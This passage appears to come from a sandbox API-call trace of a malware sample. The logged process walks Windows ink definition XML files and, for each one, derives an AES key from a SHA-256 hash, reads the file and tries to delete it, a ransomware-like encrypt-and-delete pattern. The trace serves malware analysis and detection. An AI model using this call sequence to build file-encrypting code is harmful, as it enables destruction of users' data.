hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.322] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf7 [0138.322] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.324] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.324] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.324] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.325] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0 [0138.325] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="base_altgr.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_altgr.xml", lpUsedDefaultChar=0x0) returned 15 [0138.326] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.327] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.327] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.327] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.327] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc59 [0138.327] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.329] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.329] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.329] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.330] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0 [0138.331] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="base_ca.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_ca.xml", lpUsedDefaultChar=0x0) returned 12 [0138.331] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.331] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.331] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.331] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.332] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc5e [0138.332] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.334] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.334] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.334] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.335] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0 [0138.335] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="base_heb.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_heb.xml", lpUsedDefaultChar=0x0) returned 13 [0138.336] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.337] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.337] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.337] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.337] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e2 [0138.337] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.339] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.339] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.339] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.340] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0 [0138.341] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="base_jpn.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_jpn.xml", lpUsedDefaultChar=0x0) returned 13 [0138.341] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.341] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.341] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.341] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.341] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x324 [0138.342] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.344] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.344] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.344] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.345] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0 [0138.345] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="base_kor.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_kor.xml", lpUsedDefaultChar=0x0) returned 13 [0138.359] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.359] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.359] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.359] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.359] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e8 [0138.360] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.361] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.361] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.361] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.362] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml")) returned 0 [0138.363] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="base_rtl.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="base_rtl.xml", lpUsedDefaultChar=0x0) returned 13 [0138.363] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.363] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.363] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.363] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.363] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x269 [0138.363] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.365] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.366] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.366] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.367] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml")) returned 0 [0138.367] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ja-jp.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ja-jp.xml", lpUsedDefaultChar=0x0) returned 10 [0138.368] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.369] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.369] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.369] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.369] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x40e8 [0138.369] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.372] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.372] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.372] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.374] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml")) returned 0 [0138.374] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ko-kr.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ko-kr.xml", lpUsedDefaultChar=0x0) returned 10 [0138.374] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.375] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.375] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.375] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.375] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3af9 [0138.375] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.411] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.411] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.411] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.413] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml")) returned 0 [0138.413] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="zh-changjei.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-changjei.xml", lpUsedDefaultChar=0x0) returned 16 [0138.415] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.415] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.415] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.415] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.415] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x264b [0138.416] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.419] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.419] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.419] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.420] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml")) returned 0 [0138.420] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="zh-dayi.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-dayi.xml", lpUsedDefaultChar=0x0) returned 12 [0138.421] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.421] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.421] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.421] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.421] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b3b [0138.421] ReadFile (in: hFile=0x40c, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.425] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.425] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.425] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.426] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml")) returned 0 [0138.427] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="zh-phonetic.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-phonetic.xml", lpUsedDefaultChar=0x0) returned 16 [0138.428] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.428] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.428] CryptHashData (hHash=0x284d5e8, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.429] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0138.429] GetFileSize (in: hFile=0x418, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ac3 [0138.429] ReadFile (in: hFile=0x418, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.465] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0138.465] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.465] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.466] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml")) returned 0 [0138.466] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.467] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0138.467] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="main.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.xml", lpUsedDefaultChar=0x0) returned 9 [0138.467] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.467] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.467] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.467] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0138.468] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9655 [0138.468] ReadFile (in: hFile=0x414, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0138.484] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0138.484] CryptDestroyKey (hKey=0x284d668) returned 1 [0138.484] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.485] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml")) returned 0 [0138.486] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.486] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.486] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.486] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0138.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="numbase.xml", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="numbase.xml", lpUsedDefaultChar=0x0) returned 12 [0138.489] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0138.489] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0138.489] CryptHashData (hHash=0x284d668, pbData=0x2836500, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.489] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0138.489] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c2 [0138.489] ReadFile (in: hFile=0x414, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0138.491] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.491] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0138.491] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.492] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml")) returned 0 [0138.492] FindNextFileW (in: hFindFile=0x284d628, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0138.492] FindClose (in: hFindFile=0x284d628 | out: hFindFile=0x284d628) returned 1 [0138.492] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="numbers.xml", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="numbers.xml", lpUsedDefaultChar=0x0) returned 12 [0138.494] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0138.494] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0138.494] CryptHashData (hHash=0x284d628, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.494] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0138.494] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd1 [0138.494] ReadFile (in: hFile=0x40c, 